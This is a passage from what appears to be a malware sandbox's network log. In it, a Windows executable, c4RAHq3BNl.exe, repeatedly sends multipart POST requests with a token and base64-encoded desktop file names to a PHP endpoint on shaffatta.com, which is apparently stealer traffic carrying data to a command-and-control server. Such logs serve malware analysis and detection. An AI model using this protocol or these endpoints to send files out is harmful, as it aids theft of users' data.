2024-05-03 00:08:50 UTC	1743	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 46 52 6b 39 5a 52 6b 4a 50 54 Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xFRk9ZRkJPT
2024-05-03 00:08:50 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49754	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:50 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAEBKEGHJKEBFHJDBFC Host: shaffatta.com Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:50 UTC	1759	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 4f 56 6c 64 61 51 56 42 52 55 Data Ascii: ------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xOVldaQVBRU
2024-05-03 00:08:51 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49755	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:51 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFI Host: shaffatta.com Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:51 UTC	1743	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 4f 56 6c 64 61 51 56 42 52 55 Data Ascii: ------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xOVldaQVBRU
2024-05-03 00:08:52 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49756	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:53 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAKFBGCBFHIJKECGIIJ Host: shaffatta.com Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:53 UTC	1759	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 46 52 55 64 58 57 46 56 49 56 Data Ascii: ------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xFRUdXWFVIV
2024-05-03 00:08:53 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49757	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:54 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGD Host: shaffatta.com Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:54 UTC	1759	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 46 52 6b 39 5a 52 6b 4a 50 54 Data Ascii: ------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xFRk9ZRkJPT
2024-05-03 00:08:54 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49758	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:55 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJE Host: shaffatta.com Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:55 UTC	1743	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 48 55 6c 68 61 52 45 74 4c 56 Data Ascii: ------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xHUlhaREtLV
2024-05-03 00:08:55 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49759	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:56 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGH Host: shaffatta.com Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:56 UTC	1759	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 4f 56 6c 64 61 51 56 42 52 55 Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xOVldaQVBRU
2024-05-03 00:08:56 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49760	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:58 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEH Host: shaffatta.com Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:58 UTC	1743	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 4f 56 6c 64 61 51 56 42 52 55 Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xOVldaQVBRU
2024-05-03 00:08:58 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49761	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:58 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDA Host: shaffatta.com Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:58 UTC	1743	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 51 51 55 78 53 52 31 56 44 56 Data Ascii: ------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xQQUxSR1VDV
2024-05-03 00:08:59 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49762	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:59 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGH Host: shaffatta.com Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:59 UTC	1759	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 46 52 55 64 58 57 46 56 49 56 Data Ascii: ------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xFRUdXWFVIV
2024-05-03 00:09:00 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:09:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49763	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:09:00 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDH Host: shaffatta.com Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:09:00 UTC	1759	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 46 52 6b 39 5a 52 6b 4a 50 54 Data Ascii: ------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xFRk9ZRkJPT
2024-05-03 00:09:01 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:09:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49764	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:09:01 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF Host: shaffatta.com Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:09:01 UTC	1743	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 48 55 6c 68 61 52 45 74 4c 56 Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xHUlhaREtLV
2024-05-03 00:09:01 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:09:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49765	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:09:02 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEB Host: shaffatta.com Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:09:02 UTC	1759	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 4f 56 6c 64 61 51 56 42 52 55 Data Ascii: ------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xOVldaQVBRU
2024-05-03 00:09:02 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:09:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49766	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:09:03 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEH Host: shaffatta.com Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
